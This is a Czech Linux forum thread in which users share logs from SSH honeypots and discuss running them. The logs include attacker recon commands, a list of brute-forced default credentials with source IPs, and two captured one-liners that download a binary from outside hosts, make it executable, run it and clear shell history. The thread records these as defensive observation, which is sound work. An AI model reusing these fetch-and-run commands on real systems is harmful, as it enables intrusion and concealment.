Portál AbcLinuxu, 26. dubna 2024 14:24


Nástroje: Začni sledovat (3) ?Zašle upozornění na váš email při vložení nového komentáře.

Vložit další komentář
8.3.2018 09:09 Banán
Rozbalit Rozbalit vše Re: Honeypot
Odpovědět | Sbalit | Link | Blokovat | Admin
To nám to ani neukážeš tie logy?
otasomil avatar 8.3.2018 14:53 otasomil | skóre: 39 | blog: puppylinux
Rozbalit Rozbalit vše Re: Honeypot
Neco z logu zde. Vetsinou se jedna o tytez sekvence asi 30 prikazu. Obcas neco jednoduchyho jaku uname, free, df -h, rm -rf / ..... ale to jen opravdu malo
13:26:38 	$ /gweerwe323f 	
13:26:38 	$ 	
13:26:38 	$ /bin/busybox cp; /gweerwe323f 	
13:26:38 	$ 	
13:26:38 	$ mount ;/gweerwe323f 	
13:26:38 	$ 	
13:26:38 	$ echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon 	
13:26:38 	$ 	
13:26:38 	$ echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; cat /tmp/.nippon; rm -f /tmp/.nippon 	
13:26:38 	$ 	
13:26:38 	$ echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon; cat /var/tmp/.nippon; rm -f /var/tmp/.nippon 	
13:26:38 	$ 	
13:26:38 	$ echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon 	
13:26:38 	$ 	
13:26:38 	$ echo -e '\x47\x72\x6f\x70/lib/init/rw' > /lib/init/rw/.nippon; cat /lib/init/rw/.nippon; rm -f /lib/init/rw/.nippon 	
13:26:38 	$ 	
13:26:38 	$ echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon; cat /proc/.nippon; rm -f /proc/.nippon 	
13:26:38 	$ 	
13:26:38 	$ echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon; cat /sys/.nippon; rm -f /sys/.nippon 	
13:26:38 	$ 	
13:26:38 	$ echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon; cat /dev/.nippon; rm -f /dev/.nippon 	
13:26:38 	$ 	
13:26:38 	$ echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon; cat /dev/shm/.nippon; rm -f /dev/shm/.nippon 	
13:26:38 	$ 	
13:26:38 	$ echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon; cat /dev/pts/.nippon; rm -f /dev/pts/.nippon 	
13:26:38 	$ 	
13:26:38 	$ /gweerwe323f 	
13:26:38 	$ 	
13:26:38 	$ cat /bin/echo ;/gweerwe323f 	
13:26:38 	$
A takto vypada datum, cas, geolokace IP, IP, pocet sezeni, username, password:
2018-03-08 14:05:42 	FRA - 51.254.121.56 	1 	admin 	admin@123 		
2018-03-08 14:05:40 	FRA - 51.254.121.56 	1 	admin 	admin@123 		
2018-03-08 14:05:39 	FRA - 51.254.121.56 	1 	admin 	admin@123 		
2018-03-08 14:05:38 	FRA - 51.254.121.56 	1 	admin 	admin@123 		
2018-03-08 14:05:38 	FRA - 51.254.121.56 	1 	admin 	admin@123 		
2018-03-08 13:26:37 	185.234.218.242 	30 	admin 	motorola 		
2018-03-08 12:59:30 	POL - 188.125.43.186 	1 	ethos 	live 		
2018-03-08 12:59:29 	POL - 188.125.43.186 	1 	root 	live 		
2018-03-08 11:08:51 	185.234.218.242 	32 	root 	1234 		
2018-03-08 10:19:06 	USA - 192.200.218.166 	1 	root 	zxc123$ 		
2018-03-08 10:19:05 	USA - 192.200.218.166 	1 	root 	zxc123$ 		
2018-03-08 01:53:05 	185.234.218.242 	30 	admin 	admin1 		
2018-03-08 00:59:23 	185.234.218.242 	30 	user 	user 		
2018-03-07 23:28:07 	185.234.218.242 	0 	usuario 	usuario 		
2018-03-07 20:33:47 	185.234.218.242 	32 	root 	12345 		
2018-03-07 19:50:26 	185.234.218.242 	32 	root 	ubnt 		
2018-03-07 19:23:26 	USA - 192.200.218.166 	1 	root 	12345 		
2018-03-07 19:23:24 	USA - 192.200.218.166 	1 	root 	12345 		
2018-03-07 19:20:49 	185.234.218.242 	30 	admin 	default 		
2018-03-07 19:00:22 	185.234.218.242 	32 	root 	password 		
2018-03-07 16:45:31 	FRA - 51.254.47.198 	1 	postgres 	postgres 		
2018-03-07 16:45:29 	FRA - 51.254.47.198 	1 	postgres 	postgres 		
2018-03-07 16:45:28 	FRA - 51.254.47.198 	1 	postgres 	postgres 		
2018-03-07 16:45:27 	FRA - 51.254.47.198 	1 	postgres 	postgres 		
2018-03-07 16:45:26 	FRA - 51.254.47.198 	1 	postgres 	postgres 		
2018-03-07 15:41:13 	185.234.218.242 	32 	root 	xmhdipc 		
2018-03-07 13:53:48 	185.234.218.242 	30 	admin 	password 		
2018-03-07 13:42:02 	USA - 192.200.218.166 	1 	root 	0p9o8t 		
2018-03-07 13:42:01 	USA - 192.200.218.166 	1 	root 	0p9o8t 		
2018-03-07 10:03:00 	185.234.218.242 	0 	service 	service 		
2018-03-07 09:39:09 	185.234.218.242 	30 	admin 	pfsense 		
2018-03-07 09:15:53 	USA - 173.14.84.113 	2 	pi 	raspberry 		
2018-03-07 09:15:52 	USA - 173.14.84.113 	2 	pi 	raspberryraspberry993311 		
2018-03-07 09:15:50 	USA - 173.14.84.113 	1 	pi 	raspberry 		
2018-03-07 09:15:50 	USA - 173.14.84.113 	1 	pi 	raspberryraspberry993311 		
2018-03-07 09:11:44 	185.234.218.242 	30 	admin 	default 		
2018-03-07 08:50:22 	185.234.218.242 	32 	root 	123456 		
2018-03-07 08:04:05 	185.234.218.242 	32 	root 	uClinux 		
2018-03-07 07:40:28 	185.234.218.242 	32 	root 	111111 		
2018-03-06 22:19:23 	KOR - 119.192.239.192 	1 	ethos 	live 		
2018-03-06 22:19:19 	KOR - 119.192.239.192 	1 	root 	live 		
2018-03-06 19:58:08 	JPN - 118.241.240.233 	2 	pi 	raspberryraspberry993311 		
2018-03-06 19:58:07 	JPN - 118.241.240.233 	2 	pi 	raspberry 		
2018-03-06 19:58:03 	JPN - 118.241.240.233 	1 	pi 	raspberryraspberry993311 		
2018-03-06 19:58:02 	JPN - 118.241.240.233 	1 	pi 	raspberry 		
2018-03-04 21:30:50 	CHN - 222.186.172.48 	1 	root 	root 		
2018-03-04 21:30:37 	CHN - 222.186.172.48 	1 	root 	root 		
2018-03-04 21:30:26 	CHN - 222.186.172.48 	1 	root 	root 		
2018-03-04 21:30:13 	CHN - 222.186.172.48 	1 	root 	root 		
2018-03-04 21:30:01 	CHN - 222.186.172.48 	1 	root 	root 		
K čemu hudba, která nevede k extázi... Stop MDMA !!! I spam umí být roztomilý
Rezza avatar 8.3.2018 16:10 Rezza | skóre: 25 | blog: rezza | Brno
Rozbalit Rozbalit vše Re: Honeypot
Jop, presne tenhle tam mam taky.
Bystroushaak avatar 8.3.2018 19:14 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Honeypot
Co má být ten .nippon? To je honeypot test na permissions?
otasomil avatar 8.3.2018 19:35 otasomil | skóre: 39 | blog: puppylinux
Rozbalit Rozbalit vše Re: Honeypot
Zdravim To vubec netusim co je .nippon. V nekterych prikazech je i URL volana pomoci wget ale nejde nic stahnout (Eror404). Aktualni cerstvy utok zde:
$ rm -f /tmp/run;if [ `getconf LONG_BIT` -eq 64 ];then u="http://www.bizqsoft.com/tp2/r6.log";else u="http://www.bizqsoft.com/tp2/r.log";fi;(wget -O /tmp/run $u || curl -o /tmp/run $u || python -c "import urllib;urllib.urlretrieve('$u','/tmp/run')");echo > ~/.bash_history;chmod 0777 /tmp/run && /tmp/run;rm -rf /tmp/run
K čemu hudba, která nevede k extázi... Stop MDMA !!! I spam umí být roztomilý
8.3.2018 22:26 elenril
Rozbalit Rozbalit vše Re: Honeypot
Nippon je zcela zřejmě banzai
9.3.2018 09:17 M.
Rozbalit Rozbalit vše Re: Honeypot
Nippon je zkomoleně Japonsko. Ale je mi to divný. Japonec a nemá náramek? :-)
Bystroushaak avatar 9.3.2018 10:44 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Honeypot
Neptal jsem se co znamená nippon, ale proč dělá, co dělá.
9.3.2018 11:53 marvn
Rozbalit Rozbalit vše Re: Honeypot
je to jen nazev souboru. mohlo by se to jmenovat i jinak, ale asi se autorovi to slovo libi
Jendа avatar 9.3.2018 11:59 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Honeypot
LOL, to je tady dneska nějaký sraz botů nebo trollů?
9.3.2018 12:11 marvn
Rozbalit Rozbalit vše Re: Honeypot
no dobre no, http://ddecode.com/hexdecoder/?results=9aa8836e04c89cd1b97e6a441d99578e
Bystroushaak avatar 9.3.2018 14:43 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Honeypot
Co má být pointou?
10.3.2018 00:44 pc2005 | skóre: 38 | blog: GardenOfEdenConfiguration | liberec
Rozbalit Rozbalit vše Re: Honeypot
Mě by spíš zajímalo co dělá ten
/gweerwe323f
.

Jinak do toho nipponu se zapisuje "Grop" jako ascii, google napoví. Já bych teda zkoušel něco jako .bash_history sice poutá víc pozornosti (teda pokud uživatel vypisuje i tečkový hidden soubory), ale dá se zase ospravedlnit bugem s $HOME.

Vypadá to že to je prostě jen test oprávnění. Ony embedded systémy často můžou bejt readonly.
8.3.2018 16:28 smíťa | skóre: 9 | blog: Zápisky z Lyntu
Rozbalit Rozbalit vše Re: Honeypot
Odpovědět | Sbalit | Link | Blokovat | Admin
Několik let provozuji několik honeypotů - ssh a http emulující WordPress. Data, která z toho získávám jsou velmi zajímavá a užitečná. Sám si dělám interní IP blacklist pro své reálné servery, pokud se objeví nová zranitelnost, tak se o ní díky honeypotu dozvím vcelku rychle a mohu připravit pravidla, která problém eliminují.

Co se týká SSH, tak se setkávám s tím, že pravděpodobně existují skupiny "hackerů", které mají od zadavatele předpřipravený seznam příkazů co mají napsat a jedou podle toho. Že to nejsou roboti lze poznat podle různých překlepů, co dělají, když to píšou. Nicméně scénář je vždy hodně podobný - pár příkazů na zjištění informací o serveru (cpuinfo atd.), vytvoření vlastního uživatele (v useradd se ptám třeba na oblíbený film, což jich dost vyplní :-) ) a stažení nějakého ddos skritpu a jeho spuštění. Toto se mi děje často jako přes kopírák.

9.3.2018 07:54 Aleš Kapica | skóre: 51 | blog: kenyho_stesky | Ostrava
Rozbalit Rozbalit vše Re: Honeypot
Zajímavé. Nechceš o tom napsat nějaký blogpost pro pobavení?
9.3.2018 15:47 David Indra | skóre: 15 | Prostějov
Rozbalit Rozbalit vše Re: Honeypot
Nějaké info o té emulaci WordPressu by se taky šiklo.
9.3.2018 16:40 Kate | skóre: 9
Rozbalit Rozbalit vše Re: Honeypot
Mě by zajímaly ty oblíbené filmy, inspirace na dlouhé zimní večery není nikdy dost :D (každopádně, ten honeypot samotný rozhodně také)
9.3.2018 22:41 smíťa | skóre: 9 | blog: Zápisky z Lyntu
Rozbalit Rozbalit vše Re: Honeypot
Na SSH používám osvědčený Cowrie (stejně jako NIC). Našel jsem zrovna jedno nahrané starší video "šikovného hackera" na jeden už zrušený honeypot (měl jsem hloupě jméno "pot" v hostname, což mohlo někoho chytřejšího hned odradit):

Tipy na filmy jsou většinou docela nudné - poměrně často Iron Man a aktuální marvelovky. Jeden útočník měl oblíbeného Posledního samuraje.

Také koukám, co za malware mi nahrávají a i dnes je jednoznačně nejčastější skript Simple UDP flood z roku 2004 (mluvil jsem o tom třeba na WordCampu 2016).

Pro WP používám upravený WordPot, tam jsou pro mě zajímavé samozřejmě HTTP dotazy na nové endpointy, to že někdo zkouší brute force na admin, je nuda. Zajímavé jsou také různé externí js (nejčastěji těžařské), které se snaží přes různé zranitelnosti nahrát. Nicméně většinou když jsem skripty zkoumal, tak už dávno na zdrojovém webu neexistovaly - nákaza přicházela s dost velkým zpožděním.

Každému, kdo se o bezpečnost zajímá, rozhodně doporučuji si nějaký honeypot rozjet, VPS za 25 korun u Forpsi na to bez problému stačí :-)
8.3.2018 19:13 pc2005 | skóre: 38 | blog: GardenOfEdenConfiguration | liberec
Rozbalit Rozbalit vše Re: Honeypot
Odpovědět | Sbalit | Link | Blokovat | Admin
Chtěl jsem si kdysi udělat honeypot taky, ale nakonec jsem nepřišel na to, jak zjednodušit ssh, aby se mohli ti boti vůbec přihlásit bez hesla (se slovníkovým).
Intel meltdown a = arr[x[0]&1]; karma | 帮帮我,我被锁在中国房
xkucf03 avatar 8.3.2018 21:20 xkucf03 | skóre: 49 | blog: xkucf03
Rozbalit Rozbalit vše Re: Honeypot a GDPR
Odpovědět | Sbalit | Link | Blokovat | Admin

<trolling>

Jiz nejakou dobu se zabyvam ze zvedavosti sledovanim utocniku na SSH lakanych na tzv. hrnec medu kdy se prihlasi na server a zadavaji ruzne prikazy. Tyto jsou pak zaznamenany zrovnatak jako uzivatelska jmena, hesla a lze si pocist co se hackerovi/robotovi honi hlavou. Toto je docela zajimava vec.

A jestlipak od těch nebožáků máš souhlas se zpracováním osobních údajů v souladu s GDPR? :-D

</trolling>

Mám rád, když se lidé přou, znamená to, že vědí, co dělají, a že mají směr. Frantovo.cz, SQL-DK, Relational pipes
9.3.2018 09:08 marbu | skóre: 31 | blog: hromada | Brno
Rozbalit Rozbalit vše Re: Honeypot a GDPR
Heh, možná bude statčit nahradit "Welcome on system xyz!" v /etc/motd za nějaký legal banner podobně jako to už nějakou dobu musí dělat v usa.
There is no point in being so cool in a cold world.
10.3.2018 00:44 pc2005 | skóre: 38 | blog: GardenOfEdenConfiguration | liberec
Rozbalit Rozbalit vše Re: Honeypot a GDPR
Pokud pošlou request s plným jménem a IP adresou, tak věřím že to autor zařídí :-D.
9.3.2018 20:11 Ferdinand Vaněk
Rozbalit Rozbalit vše Re: Honeypot
Odpovědět | Sbalit | Link | Blokovat | Admin
Jiz nejakou dobu se zabyvam ze zvedavosti sledovanim utocniku na SSH lakanych na tzv. hrnec medu
Toto je hyenismus nejhrubšího zrna. Ti lidé nejsou žádní útočníci, ale běženci!!! Ve své zemi nemají dostatek serverů, na kterých by se mohli realizovat, a tak hledají útočiště u nás. Proč automaticky předpokládáte, že vám chtějí škodit?? Místo, abyste se choval jako obyčejný xenofob a nácek, byste jim měl pomoci, podělit se o svůj nadbytek a poskytnout jim prostor na svém serveru. Oni vám vůbec škodit nemusí - a můžou vám naopak třeba obohatit operační systém nějakým skriptem nebo binárkou, ze kterých se něco naučíte, nebo které můžete sám používat. Nebo díky nim získáte kontakty na jiné servery, na které se jde připojit... Třeba taky jednou budete potřebovat pomoc, tak na to myslete, než se příště budete chovat zase takhle sobecky.
9.3.2018 20:17 Tomáš
Rozbalit Rozbalit vše Re: Honeypot
Odpovědět | Sbalit | Link | Blokovat | Admin
Kdysi se ty prikazy logovaly primo na tiskarnu. Dokud utocnik nema fyzicky pristup, tak nesmaze.

Dodnes by snad v linuxu mohl byt vystup na seriovy port, ale zase ho nema kazdy pocitac. Ale mozna by slo udelat neco s Raspbery pi, jenom to musis udelat dost hloupe na to, aby ti nehackli i to Rpi.
otasomil avatar 10.3.2018 15:37 otasomil | skóre: 39 | blog: puppylinux
Rozbalit Rozbalit vše Re: Honeypot
Odpovědět | Sbalit | Link | Blokovat | Admin
Pokus o stazeni a spusteni binarky:
$ #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://199.231.68.230/ys808e curl -O http://199.231.68.230/ys808e chmod +x ys808e ./ys808e 
Virustotal rika toto
SHA256 soucet souboru ys808e ve vyhledavani Google
K čemu hudba, která nevede k extázi... Stop MDMA !!! I spam umí být roztomilý
otasomil avatar 18.3.2018 07:11 otasomil | skóre: 39 | blog: puppylinux
Rozbalit Rozbalit vše Re: Honeypot
Odpovědět | Sbalit | Link | Blokovat | Admin
Zdravim
Vyzkum pouzivanych portu:
port 50000 nezaznamenano jedine prihlaseni
port 19458 nezaznamenano jedine prihlaseni
port 2222 ktery je u haas proxy nastaven jako vychozi a asi je uz robotum proflaknuty takze nekolik prihlaseni za den tu bylo.
No a port 22 tam to holt frci v desitkach prihlaseni denne.
K čemu hudba, která nevede k extázi... Stop MDMA !!! I spam umí být roztomilý

Založit nové vláknoNahoru

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

ISSN 1214-1267, (c) 1999-2007 Stickfish s.r.o.